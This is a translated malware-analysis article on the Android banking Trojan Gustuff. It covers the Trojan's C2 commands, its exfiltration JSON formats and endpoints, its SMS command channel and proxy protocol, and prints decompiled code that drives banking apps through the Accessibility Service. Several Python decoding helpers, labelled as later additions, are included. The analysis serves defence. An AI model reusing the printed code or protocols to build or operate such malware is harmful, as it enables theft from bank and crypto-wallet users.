How the Android Trojan Gustuff skims the cream (fiat and crypto) off your accounts


The other day Group-IB reported on the activity of the mobile Android Trojan Gustuff. It operates exclusively on international markets, attacking customers of the 100 largest foreign banks, users of 100 mobile crypto wallets, and large e-commerce resources. The developer of Gustuff, however, is a Russian-speaking cybercriminal operating under the nickname Bestoffer. Until recently he advertised his Trojan as "a serious product for people with knowledge and experience."

Group-IB malware analyst Ivan Pisarev describes in his research, in detail, how Gustuff works and what its dangers are.

Who is Gustuff hunting?

Gustuff is a new generation of malware with fully automated functions. According to the developer, the Trojan is a new, improved version of the AndyBot malware, which since November 2017 has been attacking Android phones and stealing money through phishing web forms disguised as the mobile applications of well-known international banks and payment systems. Bestoffer stated that the rental price of the Gustuff bot was $800 per month.

Analysis of the Gustuff sample showed that the Trojan can potentially target customers who use the mobile applications of the largest banks, such as Bank of America, Bank of Scotland, JPMorgan, Wells Fargo, Capital One, TD Bank and PNC Bank, as well as crypto wallets: Bitcoin Wallet, BitPay, Cryptopay, Coinbase and others.

Originally created as a classic banking Trojan, Gustuff in its current version has significantly expanded its list of targets. In addition to Android banking applications, fintech companies and crypto services, Gustuff targets users of marketplace applications, online stores, payment systems and instant messengers: in particular PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut and others.

Entry point: designed for mass infection

Gustuff uses a "classic" vector for getting onto Android smartphones: SMS mailings containing links to APK files. Once an Android device is infected with the Trojan, Gustuff can, on command from the server, spread further through the contact database of the infected phone or through the server's own database. Gustuff's functionality is designed for mass infection and maximum profit for its operators: it has a unique "autofill" function for legitimate mobile banking applications and crypto wallets, which allows the theft of money to be accelerated and scaled.

Analysis of the Trojan showed that the autofill function is implemented using the Accessibility Service, a service intended for people with disabilities. Gustuff is not the first Trojan to successfully bypass the protection against interaction with the window elements of other applications by using this Android service. However, use of the Accessibility Service in combination with an autofiller is still rare.

After it is downloaded to the victim's phone, Gustuff uses the Accessibility Service to interact with the windows of other applications (banking, cryptocurrency, online shopping, messaging and so on), performing the actions the attackers need. For example, on command from the server the Trojan can press buttons and change the values of text fields in banking applications. The Accessibility Service mechanism allows the Trojan to bypass the security mechanisms banks used against the previous generation of Trojans, as well as the security policy changes Google introduced in newer versions of the Android OS. Gustuff also "knows how" to disable Google Protect: according to the author, this function works in 70% of cases.


Gustuff can also display fake PUSH notifications carrying the icons of legitimate mobile applications. The user taps the PUSH notification and sees a phishing window, downloaded from the server, into which they enter the requested bank card or crypto wallet data. In another Gustuff scenario, the application on whose behalf the PUSH notification was shown is opened. In that case the malware, on command from the server and through the Accessibility Service, can fill in the fields of the banking application for a fraudulent transaction.

Gustuff's functionality also includes sending information about the infected device to the server, reading and sending SMS messages, sending USSD requests, launching a SOCKS5 proxy, following a link, sending files (including photo scans of documents, screenshots and photos) to the server, and resetting the device to factory settings.

Malware Analysis

Before the malicious application is installed, the Android OS shows the user a window listing the permissions requested by Gustuff:

[Screenshot: permissions requested by Gustuff at install time]
The application is installed only after the user's consent is obtained. After the application is launched, the Trojan shows the user a window:

[Screenshot: window shown by Gustuff after first launch]
After that it hides its icon.

Gustuff is packed, according to its author, with the packer from FTT. After launch, the application periodically contacts the CnC server to receive commands. Several of the files we analysed used the IP address 88.99.171[.]105 as the control server (hereinafter referred to as <%CnC%>).

After launch, the program starts sending messages to the server at http://<%CnC%>/api/v1/get.php.

The response is expected to be JSON in the following format:

{
    "results" : "OK",
    "command":{
        "id": "<%id%>",
        "command":"<%command%>",
        "timestamp":"<%Server Timestamp%>",
        "params":{
		<%Command parameters as JSON%>
        },
    },
}

Each time the application contacts the server, it sends information about the infected device. The message format is shown below. Note that the full, extra, apps and permission fields are optional and are sent only on request from the CnC.

{
    "info":
    {
        "info":
        {
            "cell":<%Sim operator name%>,
            "country":<%Country ISO%>,
            "imei":<%IMEI%>,
            "number":<%Phone number%>,
            "line1Number":<%Phone number%>,
            "advertisementId":<%ID%>
        },
        "state":
        {
            "admin":<%Has admin rights%>,
            "source":<%String%>,
            "needPermissions":<%Application needs permissions%>,
            "accesByName":<%Boolean%>,
            "accesByService":<%Boolean%>,
            "safetyNet":<%String%>,
            "defaultSmsApp":<%Default Sms Application%>,
            "isDefaultSmsApp":<%Current application is Default Sms Application%>,
            "dateTime":<%Current date time%>,
            "batteryLevel":<%Battery level%>
        },
        "socks":
        {
            "id":<%Proxy module ID%>,
            "enabled":<%Is enabled%>,
            "active":<%Is active%>
        },
        "version":
        {
            "versionName":<%Package Version Name%>,
            "versionCode":<%Package Version Code%>,
            "lastUpdateTime":<%Package Last Update Time%>,
            "tag":<%Tag, default value: "TAG"%>,
            "targetSdkVersion":<%Target Sdk Version%>,
            "buildConfigTimestamp":1541309066721
        },
    },
    "full":
    {
        "model":<%Device Model%>,
        "localeCountry":<%Country%>,
        "localeLang":<%Locale language%>,
        "accounts":<%JSON array, contains from "name" and "type" of accounts%>,
        "lockType":<%Type of lockscreen password%>
    },
    "extra":
    {
        "serial":<%Build serial number%>,
        "board":<%Build Board%>,
        "brand":<%Build Brand%>,
        "user":<%Build User%>,
        "device":<%Build Device%>,
        "display":<%Build Display%>,
        "id":<%Build ID%>,
        "manufacturer":<%Build manufacturer%>,
        "model":<%Build model%>,
        "product":<%Build product%>,
        "tags":<%Build tags%>,
        "type":<%Build type%>,
        "imei":<%imei%>,
        "imsi":<%imsi%>,
        "line1number":<%phonenumber%>,
        "iccid":<%Sim serial number%>,
        "mcc":<%Mobile country code of operator%>,
        "mnc":<%Mobile network codeof operator%>,
        "cellid":<%GSM-data%>,
        "lac":<%GSM-data%>,
        "androidid":<%Android Id%>,
        "ssid":<%Wi-Fi SSID%>
    },
    "apps":{<%List of installed applications%>},
    "permission":<%List of granted permissions%>
} 

Storing configuration data

Gustuff stores important information in a preferences file. The file name, as well as the names of the parameters inside it, are the result of computing the MD5 sum of the string 15413090667214.6.1<%name%>, where <%name%> is the original name. A Python interpretation of the name-generation function:

import hashlib

def nameGenerator(input):
    # MD5 of the constant prefix concatenated with the original name
    output = hashlib.md5(("15413090667214.6.1" + input).encode()).hexdigest()
    return output

In what follows we denote it as nameGenerator(input).
So the name of the preferences file is nameGenerator("API_SERVER_LIST"), and it contains parameters with the following names:

Variable name  Value
nameGenerator("API_SERVER_LIST")  Contains the list of CnC addresses as an array.
nameGenerator("API_SERVER_URL")  Contains the CnC address.
nameGenerator("SMS_UPLOAD")  Flag, set by default. If the flag is set, SMS messages are sent to the CnC.
nameGenerator("SMS_ROOT_NUMBER")  The phone number to which SMS messages received by the infected device are forwarded. Default is null.
nameGenerator("SMS_ROOT_NUMBER_RESEND")  Flag, cleared by default. If set, an SMS received by the infected device is forwarded to the root number.
nameGenerator("DEFAULT_APP_SMS")  Flag, cleared by default. If this flag is set, the application processes incoming SMS messages.
nameGenerator("DEFAULT_ADMIN")  Flag, cleared by default. If the flag is set, the application has administrator rights.
nameGenerator("DEFAULT_ACCESSIBILITY")  Flag, cleared by default. If the flag is set, the service that uses the Accessibility Service is running.
nameGenerator("APPS_CONFIG")  A JSON object with the list of actions to perform when an Accessibility event associated with a particular application fires.
nameGenerator("APPS_INSTALLED")  Stores the list of applications installed on the device.
nameGenerator("IS_FIST_RUN")  Flag, reset on the first launch.
nameGenerator("UNIQUE_ID")  Contains a unique identifier. Generated when the bot is launched for the first time.
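As an added example (not code from the article or from the malware), the following Python reproduces the name derivation for every key in the table so that an analyst can map preference file and parameter names recovered from a device back to their readable keys. The lowercase hex-digest form of the MD5 and the ".xml" suffix handling are assumptions, not facts stated in the article.

```python
import hashlib

# Constant prefix from the article; Gustuff uses MD5(prefix + key) as both the
# preferences file name and the parameter names inside it.
GUSTUFF_NAME_PREFIX = "15413090667214.6.1"

# Keys documented in the table above.
KNOWN_KEYS = [
    "API_SERVER_LIST", "API_SERVER_URL", "SMS_UPLOAD", "SMS_ROOT_NUMBER",
    "SMS_ROOT_NUMBER_RESEND", "DEFAULT_APP_SMS", "DEFAULT_ADMIN",
    "DEFAULT_ACCESSIBILITY", "APPS_CONFIG", "APPS_INSTALLED",
    "IS_FIST_RUN", "UNIQUE_ID",
]


def name_generator(key: str) -> str:
    """Reproduce nameGenerator: MD5 hex digest (assumed lowercase) of prefix + key."""
    return hashlib.md5((GUSTUFF_NAME_PREFIX + key).encode("utf-8")).hexdigest()


def build_name_table() -> dict:
    """Map each obfuscated name back to the readable key it was derived from."""
    return {name_generator(k): k for k in KNOWN_KEYS}


def identify_artifacts(filenames):
    """Given file or parameter names recovered from a device (for example the app's
    shared_prefs directory), return {name_as_seen: readable_key} for those that
    Gustuff would produce. Matching is case-insensitive and a trailing ".xml" is
    stripped (assumption: SharedPreferences files carry that suffix on disk)."""
    table = build_name_table()
    hits = {}
    for fn in filenames:
        base = fn.lower()
        if base.endswith(".xml"):
            base = base[:-4]
        if base in table:
            hits[fn] = table[base]
    return hits


if __name__ == "__main__":
    # Constructed sample listing: one Gustuff-derived name among unrelated files.
    sample = [name_generator("API_SERVER_LIST") + ".xml", "WebViewChromiumPrefs.xml"]
    for fn, key in identify_artifacts(sample).items():
        print(f"{fn} -> nameGenerator({key!r})")
```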

Module for processing commands from the server

The application stores the addresses of the CnC servers as an array of Base85-encoded strings. The list of CnC servers can be changed when the corresponding command is received, in which case the addresses are saved in the preferences file.

In response to the request, the server sends a command to the application. Commands and parameters are passed in JSON format. The application can process the following commands:

Command  Description
forwardStart  Start sending SMS messages received by the infected device to the CnC server.
forwardStop  Stop sending SMS messages received by the infected device to the CnC server.
ussdRun  Execute a USSD request. The number to which the USSD request is made is in the "number" JSON field.
sendSms  Send one SMS message (if necessary, the message is "split" into parts). As a parameter, the command takes a JSON object with the fields "to" (destination number) and "body" (message body).
sendSmsAb  Send SMS messages (if necessary, the message is "split" into parts) to everyone in the contact list of the infected device. The interval between messages is 10 seconds. The message body is in the "body" JSON field.
sendSmsMass  Send SMS messages (if necessary, the message is "split" into parts) to the contacts specified in the command parameters. The interval between messages is 10 seconds. As a parameter, the command takes a JSON array (the "sms" field) whose elements contain the fields "to" (destination number) and "body" (message body).
changeServer  This command can take as a parameter a value with the "url" key, in which case the bot changes the value of nameGenerator("SERVER_URL"), or with the "array" key, in which case the bot writes the array to nameGenerator("API_SERVER_LIST"). In this way the application changes the addresses of the CnC servers.
adminNumber  The command is designed to work with the root number. It takes a JSON object with the following parameters: "number" (change nameGenerator("ROOT_NUMBER") to the received value), "resend" (change nameGenerator("SMS_ROOT_NUMBER_RESEND")), "sendId" (send the uniqueID to nameGenerator("ROOT_NUMBER")).
updateInfo  Send information about the infected device to the server.
wipeData  The command is designed to delete user data. Depending on the name under which the application was launched, either the data is completely erased with a device reboot (primary user), or only the user's data is erased (secondary user).
socksStart  Launch the Proxy module. The module's operation is described in a separate section.
socksStop  Stop the Proxy module.
openLink  Follow a link. The link is in the JSON parameter under the "url" key. "android.intent.action.VIEW" is used to open the link.
uploadAllSms  Send all SMS messages received by the device to the server.
uploadAllPhotos  Send images from the infected device to a URL. The URL comes as a parameter.
uploadFile  Send a file from the infected device to a URL. The URL comes as a parameter.
uploadPhoneNumbers  Send phone numbers from the contact list to the server. If a JSON object with the "ab" key is received as a parameter, the application takes the contact list from the phone book. If a JSON object with the "sms" key is received, the application reads the contact list from the senders of SMS messages.
changeArchive  The application downloads a file from the address that comes as a parameter under the "url" key. The downloaded file is saved under the name "archive.zip". The application then unpacks the file, optionally using the archive password "b5jXh37gxgHBrZhQ4j3D". The unpacked files are saved in the [external storage]/hgps directory. In this directory the application stores its web fakes (described below).
actions  The command is designed to work with the Action Service, which is described in a separate section.
test  Does nothing.
download  The command downloads a file from a remote server and saves it to the "Downloads" directory. The URL and file name come as parameters, in the "url" and "fileName" fields of the JSON parameter object respectively.
remove  Removes a file from the "Downloads" directory. The file name comes in the JSON parameter under the "fileName" key. The default file name is "tmp.apk".
notification  Show a notification whose description and title texts are defined by the management server.

Format of the notification command:

{
    "results" : "OK",
    "command":{
    "id": <%id%>,
    "command":"notification",
    "timestamp":<%Server Timestamp%>,
    "params":{
        "openApp":<%Open original app or not%>,
        "array":[
                      {"title":<%Title text%>,
                      "desc":<%Description text%>,
                      "app":<%Application name%>}
                   ]
                   },
        },
}

The notification created by the file under investigation looks identical to the notifications created by the application named in the app field. If the value of the openApp field is true, then when the notification is opened the application named in the app field is launched. If the value of the openApp field is false, then:

  • A phishing window opens whose content is loaded from the directory <%external storage%>/hgps/<%filename%>
  • A phishing window opens whose content is loaded from the server <%url%>?id=<%Bot id%>&app=<%application name%>
  • A phishing window opens disguised as a Google Play card form, with fields for entering card details.

The application sends the result of any command to <%CnC%>set_state.php as a JSON object in the following format:

{
    "command":
    {
        "command":<%command%>,
        "id":<%command_id%>,
        "state":<%command_state%>
    }
    "id":<%bot_id%>
}

ActionsService
The list of commands processed by the application includes actions. When this command is received, the command processing module calls this service to execute the extended command. The service takes a JSON object as a parameter. The service can execute the following commands:

1. PARAMS_ACTION - on receiving such a command, the service first reads from the JSON parameter the value of the Type key, which can be one of the following:

  • serviceInfo - the subcommand reads the value with the includeNotImportant key from the JSON parameter. If the flag is true, the application sets the FLAG_ISOLATED_PROCESS flag for the service that uses the Accessibility Service. In this way the service is launched differently.
  • root - obtain and send to the server information about the window currently in focus. The application obtains the information using the AccessibilityNodeInfo class.
  • arun - request administrator rights.
  • delay - pause the ActionsService for the number of milliseconds specified in the parameter with the "data" key.
  • windows - send the list of windows visible to the user.
  • install - install an application on the infected device. The name of the archive package is in the "fileName" key. The archive itself is in the Downloads directory.
  • global - the subcommand navigates away from the current window:
    • to the Quick Settings menu
    • back
    • home
    • to the notifications
    • to the recently opened applications window

  • launch - launch an application. The application name comes as a parameter with the data key.
  • sounds - switch the sound mode to silent.
  • unlock - turns on the screen backlight and keyboard at full brightness. The application performs this action using a WakeLock, with the string [Application label]:INFO as the tag.
  • permissionOverlay - function not implemented (the response to the command is {"message":"not supported"} or {"message":"low sdk"})
  • gesture - function not implemented (the response to the command is {"message":"not supported"} or {"message":"Low API"})
  • permissions - this command is supposed to request permissions for the application. However, the request function is not implemented, so the command does nothing. The list of requested rights comes as a JSON array under the "permissions" key. Standard list:
    • android.permission.READ_PHONE_STATE
    • android.permission.READ_CONTACTS
    • android.permission.CALL_PHONE
    • android.permission.RECEIVE_SMS
    • android.permission.SEND_SMS
    • android.permission.READ_SMS
    • android.permission.READ_EXTERNAL_STORAGE
    • android.permission.WRITE_EXTERNAL_STORAGE

  • open - show a phishing window. Depending on the parameter received from the server, the application can show the following phishing windows:
    • A phishing window whose content is read from a file in the directory <%external directory%>/hgps/<%param_filename%>. The result of the user's interaction with the window is sent to <%CnC%>/records.php
    • A phishing window whose content is preloaded from the address <%url_param%>?id=<%bot_id%>&app=<%packagename%>. The result of the user's interaction with the window is sent to <%CnC%>/records.php
    • A phishing window disguised as a Google Play card form.

  • interactive - the command interacts with the window elements of other applications through the AccessibilityService. A dedicated service is implemented in the program for this interaction. The application under investigation can interact with windows that are:
    • Currently active. In this case the parameter contains the id or the text (name) of the element to interact with.
    • Visible to the user at the time the command is executed. The application selects such windows by id.

    Having obtained the AccessibilityNodeInfo objects for the window elements of interest, the application, depending on the parameters, can perform the following actions:

    • focus - set focus on the element.
    • click - click on the element.
    • actionId - perform the action with the given ID.
    • setText - change the text of the element. The text can be changed in two ways: by performing the ACTION_SET_TEXT action (if the Android version of the infected device is greater than or equal to LOLLIPOP), or by placing the string on the clipboard and pasting it into the element (for older versions). This command can be used to change data in a banking application.

2. PARAMS_ACTIONS - the same as PARAMS_ACTION, except that a JSON array of commands arrives.

Many will probably be interested in what the function for interacting with the window of another application looks like. This is how the function is implemented in Gustuff (decompiled; the duplicate variable produced by the decompiler has been separated into repeat and count, and the return value, which the decompilation does not recover, is assumed):

boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
    int repeat = action.optInt("repeat", 1);   // how many times to apply the action to each node
    Iterator aiListIterator = ((Iterable)aiList).iterator();
    int count = 0;                             // number of actions that succeeded
    while(aiListIterator.hasNext()) {
        Object ani = aiListIterator.next();
        if(1 <= repeat) {
            int index;
            for(index = 1; true; ++index) {
                if(action.has("focus")) {
                    if(((AccessibilityNodeInfo)ani).performAction(1)) {   // ACTION_FOCUS
                        ++count;
                    }
                }
                else if(action.has("click")) {
                    if(((AccessibilityNodeInfo)ani).performAction(16)) {  // ACTION_CLICK
                        ++count;
                    }
                }
                else if(action.has("actionId")) {
                    if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
                        ++count;
                    }
                }
                else if(action.has("setText")) {
                    Context context = this.getApplicationContext();
                    String text = action.optString("setText");
                    if(performSetTextAction(context, ((AccessibilityNodeInfo)ani), text)) {
                        ++count;
                    }
                }
                if(index == repeat) {
                    break;
                }
            }
        }
        ((AccessibilityNodeInfo)ani).recycle();
    }
    res.addPropertyNumber("res", Integer.valueOf(count));
    return count > 0;   // assumed: the decompilation does not recover the return value
}

The text replacement function:

boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
    boolean result;
    if(Build$VERSION.SDK_INT >= 21) {   // LOLLIPOP and newer: set the text directly
        Bundle b = new Bundle();
        b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
        result = ani.performAction(0x200000, b);  // ACTION_SET_TEXT
    }
    else {                               // older versions: copy to clipboard and paste
        Object clipboard = context.getSystemService("clipboard");
        if(clipboard != null) {
            ((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
            result = ani.performAction(0x8000);  // ACTION_PASTE
        }
        else {
            result = false;
        }
    }
    return result;
}

Thus, with the control server configured correctly, Gustuff is able to fill in text fields in a banking application and press the buttons needed to complete a transaction. The Trojan does not even need to log in to the application: it is enough to send a command to display a PUSH notification and then open the already installed banking application. The user authenticates, after which Gustuff can perform the autofill.

SMS message processing module

The application registers an event handler for SMS messages received by the infected device. The application under study can receive commands from the operator that arrive in the body of an SMS message. Commands arrive in the format:

7!5=<%Base64 encoded command%>

The application searches all incoming SMS messages for the string 7!5=; if the string is found, it Base64-decodes the string starting at offset 4 and executes the command. The commands are the same as those from the CnC. The result of execution is sent to the same number the command came from. Response format:

7*5=<%Base64 encoding of "result_code command"%>
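As an added example, not code from the article or from Gustuff, the following Python scans a set of SMS messages for the 7!5= command marker and the 7*5= reply marker described above and decodes them for triage of a device's SMS store. The sample messages are constructed; treating the decoded command as JSON (as with the CnC) is an assumption.

```python
import base64
import binascii
import json

SMS_CMD_MARKER = "7!5="   # marks an inbound operator command
SMS_RESP_MARKER = "7*5="  # marks the bot's reply


def _decode_after(body, marker):
    """Base64-decode what follows `marker` in `body`; None if absent or not valid Base64."""
    pos = body.find(marker)
    if pos < 0:
        return None
    payload = body[pos + len(marker):].strip()
    if not payload:
        return None
    try:
        return base64.b64decode(payload, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def extract_sms_command(body):
    """Decoded command from a '7!5=' SMS (parsed as JSON when possible, else the raw
    text), or None when the message is not a command."""
    text = _decode_after(body, SMS_CMD_MARKER)
    if text is None:
        return None
    try:
        return json.loads(text)
    except json.JSONDecodeError:
        return text


def parse_sms_reply(body):
    """(result_code, command) from a '7*5=' reply SMS, or None."""
    text = _decode_after(body, SMS_RESP_MARKER)
    if text is None:
        return None
    code, _, command = text.partition(" ")
    return code, command


def scan_sms_log(messages):
    """messages: iterable of (sender, body). Returns triage findings for command and
    reply SMS; benign messages produce nothing."""
    findings = []
    for sender, body in messages:
        cmd = extract_sms_command(body)
        if cmd is not None:
            findings.append({"sender": sender, "kind": "command", "payload": cmd})
            continue
        reply = parse_sms_reply(body)
        if reply is not None:
            findings.append({"sender": sender, "kind": "reply",
                             "result_code": reply[0], "command": reply[1]})
    return findings


# Constructed sample SMS log (sender, body): one command, one reply, one benign message.
SAMPLE_MESSAGES = [
    ("+10000000001", "7!5=" + base64.b64encode(b'{"command":"updateInfo","params":{}}').decode()),
    ("+10000000001", "7*5=" + base64.b64encode(b"0 updateInfo").decode()),
    ("+10000000002", "Your verification code is 123456"),
]

if __name__ == "__main__":
    for finding in scan_sms_log(SAMPLE_MESSAGES):
        print(finding)
```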

Optionally, the application can forward all received messages to the Root number. For this, the Root number must be specified in the preferences file and the message redirection flag must be set. The SMS message is sent to the attacker's number in the format:

<%From number%> - <%Time, format: dd/MM/yyyy HH:mm:ss%> <%SMS body%>

Also optionally, the application can send messages to the CnC. The SMS message is sent to the server in JSON format:

{
    "id":<%BotID%>,
    "sms":
    {
        "text":<%SMS body%>,
        "number":<%From number%>,
        "date":<%Timestamp%>
    }
}

If the nameGenerator("DEFAULT_APP_SMS") flag is set, the application stops processing the SMS message and clears the list of incoming messages.

Proxy module

The application under study contains a Backconnect Proxy module (hereinafter the Proxy module), implemented as a separate class with static fields holding the configuration. The configuration data is stored in the sample in the clear:

[Screenshot: Proxy module configuration class with its static fields]

All actions performed by the Proxy module are logged to files. For this, the application creates a directory named "logs" in External Storage (the ProxyConfigClass.logsDir field of the configuration class), in which the log files are stored. Logging goes to files with the following names:

  1. main.txt - the activity of the class named CommandServer is logged to this file. In what follows, logging the string str to this file is denoted mainLog(str).
  2. session-<%id%>.txt - this file stores the log data associated with a particular proxy session. In what follows, logging the string str to this file is denoted sessionLog(str).
  3. server.txt - this file is used to record all data written to the files described above.

Log data format:

<%Date%> [Thread[<%thread id%>], id[]]: log-string

Exceptions that occur while the Proxy module is running are also logged to a file. For this, the application creates a JSON object in the following format:

{
    "uncaughtException":<%short description of throwable%>
    "thread":<%thread%>
    "message":<%detail message of throwable%>
    "trace":        //Stack trace info
        [
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            },
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            }
        ]
}

It then converts it to its string representation and logs it.

The Proxy module is launched after the corresponding command is received. When the command to launch the Proxy module arrives, the application starts a service called MainService, which is responsible for managing the Proxy module: starting and stopping it.

Service start stages:

1. Starts a timer that runs once a minute and checks whether the Proxy module is active. If the module is not running, it starts it.
Also, when the android.net.conn.CONNECTIVITY_CHANGE event fires, the Proxy module is started.

2. The application creates a wake-lock with the PARTIAL_WAKE_LOCK parameter and acquires it. This prevents the device's CPU from entering sleep mode.

3. Initialises the command-processing class of the Proxy module, first logging the line mainLog("start server") and

Server::start() host[<%proxy_cnc%>], commandPort[<%command_port%>], proxyPort[<%proxy_port%>]

where proxy_cnc, command_port and proxy_port are parameters taken from the Proxy server configuration.

The command processing class is called CommandConnection. Immediately after launch, it performs the following actions:

4. Connects to ProxyConfigClass.host:ProxyConfigClass.commandPort and sends data about the infected device there in JSON format:

{
    "id":<%id%>,
    "imei":<%imei%>,
    "imsi":<%imsi%>,
    "model":<%model%>,
    "manufacturer":<%manufacturer%>,
    "androidVersion":<%androidVersion%>,
    "country":<%country%>,
    "partnerId":<%partnerId%>,
    "packageName":<%packageName%>,
    "networkType":<%networkType%>,
    "hasGsmSupport":<%hasGsmSupport%>,
    "simReady":<%simReady%>,
    "simCountry":<%simCountry%>,
    "networkOperator":<%networkOperator%>,
    "simOperator":<%simOperator%>,
    "version":<%version%>
}

Where:

  • id - identifier; the application tries to read the value of the "id" field from a Shared Preferences file named "x". If the value cannot be obtained, it generates a new one. Thus the Proxy module has its own identifier, generated in the same way as the Bot ID.
  • imei - the device's IMEI. If an error occurred while obtaining the value, an error message is written in place of this field.
  • imsi - the device's International Mobile Subscriber Identity. If an error occurred while obtaining the value, an error message is written in place of this field.
  • model - the end-user-visible name of the end product.
  • manufacturer - the manufacturer of the product/hardware (Build.MANUFACTURER).
  • androidVersion - a string in the format "<%release_version%> (<%os_version%>),<%sdk_version%>"
  • country - the device's current locale.
  • partnerId - an empty string.
  • packageName - the package name.
  • networkType - the type of the current network connection (for example "WIFI", "MOBILE"). On error, returns null.
  • hasGsmSupport - true if the phone supports GSM, otherwise false.
  • simReady - SIM card state.
  • simCountry - ISO country code (based on the SIM card provider).
  • networkOperator - the operator name. If an error occurred while obtaining the value, an error message is written in place of this field.
  • simOperator - the Service Provider Name (SPN). If an error occurred while obtaining the value, an error message is written in place of this field.
  • version - this field is stored in the configuration class; for the tested bot versions it was "1.6".

5. Switches to waiting for commands from the server. Commands from the server arrive in the form:

  • offset 0 - command
  • offset 1 - sessionId
  • offset 2 - length
  • offset 4 - data

When a command arrives, the application logs:
mainLog("Header {sessionId[<%id%>], type[<%command%>], length[<%length%>] }")

The following commands from the server are possible:

Name  Command  Data  Description
connectionId  0  Connection ID  Create a new connection
SLEEP  3  Time  Pause the Proxy module
PING_PONG  4  -  Send a PONG message

The PONG message consists of 4 bytes and looks like this: 0x04000000.
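As an added example (not the article's or the malware's own code), the following Python parses a captured command-channel byte stream into frames using the layout given above, so that the traffic can be labelled during analysis of a Proxy session. The 2-byte length is treated as little-endian, which is an assumption the article does not state, and the sample stream is constructed.

```python
import struct

# Command codes from the table above.
CMD_CONNECTION_ID = 0
CMD_SLEEP = 3
CMD_PING_PONG = 4
CMD_NAMES = {CMD_CONNECTION_ID: "connectionId", CMD_SLEEP: "SLEEP", CMD_PING_PONG: "PING_PONG"}

# The 4-byte PONG message quoted above: command 4, sessionId 0, length 0.
PONG = b"\x04\x00\x00\x00"


def parse_frames(buf: bytes):
    """Split a command-channel byte stream into frames:
    command (offset 0, 1 byte), sessionId (offset 1, 1 byte),
    length (offset 2, 2 bytes, assumed little-endian), data (offset 4, `length` bytes).
    Returns (frames, remainder); remainder is an incomplete trailing frame to keep
    for the next read."""
    frames = []
    pos = 0
    while pos + 4 <= len(buf):
        cmd, session_id, length = struct.unpack_from("<BBH", buf, pos)
        if pos + 4 + length > len(buf):
            break  # header seen but data not yet complete
        data = buf[pos + 4:pos + 4 + length]
        frames.append({
            "command": cmd,
            "name": CMD_NAMES.get(cmd, "unknown"),
            "sessionId": session_id,
            "length": length,
            "data": data,
        })
        pos += 4 + length
    return frames, buf[pos:]


def is_pong(buf: bytes) -> bool:
    """True if `buf` is exactly the PONG message."""
    return buf == PONG


def summarize(frames):
    """One line per frame, in the shape of the bot's own mainLog header line."""
    return [
        "Header {sessionId[%d], type[%d], length[%d] } -> %s"
        % (f["sessionId"], f["command"], f["length"], f["name"])
        for f in frames
    ]


# Constructed sample stream: a connectionId frame, a SLEEP frame, then a truncated header.
SAMPLE_STREAM = (
    b"\x00\x07\x02\x00" + b"AB"                    # connectionId, session 7, 2 data bytes
    + b"\x03\x01\x04\x00" + b"\x10\x27\x00\x00"    # SLEEP, session 1, 4 data bytes
    + b"\x04\x00\x00"                              # only 3 of 4 header bytes received
)

if __name__ == "__main__":
    frames, rest = parse_frames(SAMPLE_STREAM)
    for line in summarize(frames):
        print(line)
    print("buffered for next read:", rest.hex())
```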

When the connectionId command (create a new connection) is received, CommandConnection creates an instance of the ProxyConnection class.

  • Two classes take part in the proxy implementation: ProxyConnection and end. When a ProxyConnection object is created, it connects to the address ProxyConfigClass.host:ProxyConfigClass.proxyPort and passes a JSON object:

 {
    "id":<%connectionId%>
}

In response, the server sends a SOCKS5 message containing the address of the remote server with which a connection must be established. Interaction with that server goes through the end class. The connection setup can be represented schematically as follows:

[Diagram: Proxy module connection setup]

Network interaction

To hinder traffic analysis with network sniffers, interaction between the CnC server and the application can be protected with SSL. All data transferred to and from the server is in JSON format. The application makes the following requests while running:

  • http://<%CnC%>/api/v1/set_state.php - result of command execution.
  • http://<%CnC%>/api/v1/get.php - receive a command.
  • http://<%CnC%>/api/v1/load_sms.php - upload SMS messages from the infected device.
  • http://<%CnC%>/api/v1/load_ab.php - upload the contact list from the infected device.
  • http://<%CnC%>/api/v1/aevents.php - request made when the parameters in the preferences file are updated.
  • http://<%CnC%>/api/v1/set_card.php - upload data obtained through the phishing window that imitates the Google Play Market.
  • http://<%CnC%>/api/v1/logs.php - upload log data.
  • http://<%CnC%>/api/v1/records.php - upload data obtained through phishing windows.
  • http://<%CnC%>/api/v1/set_error.php - report an error that occurred.

Recommendations

To protect their customers from the threat of mobile Trojans, companies should use comprehensive solutions that allow malicious activity to be monitored and prevented without installing additional software on users' devices.

For this, signature-based methods of detecting mobile Trojans need to be reinforced with technologies that analyse the behaviour of both the customer and the application itself. Protection should also include device identification using digital fingerprinting technology, which makes it possible to recognise when an account is being used from an atypical device and has already fallen into the hands of a fraudster.

A fundamentally important point is the availability of cross-channel analysis, which allows companies to control the risks that arise not only on the Internet but also in the mobile channel, for example in mobile banking applications, cryptocurrency transactions and anywhere else a transaction can be performed.

Security rules for users:

  • do not install applications on Android OS mobile devices from any source other than Google Play, and pay close attention to the permissions an application requests;
  • install Android OS updates regularly;
  • pay attention to the extensions of downloaded files;
  • do not visit suspicious resources;
  • do not click on links received in SMS messages.

Author: Semyon Rogachev, junior malware research specialist at the Group-IB Computer Forensics Laboratory.

Source: www.habr.com
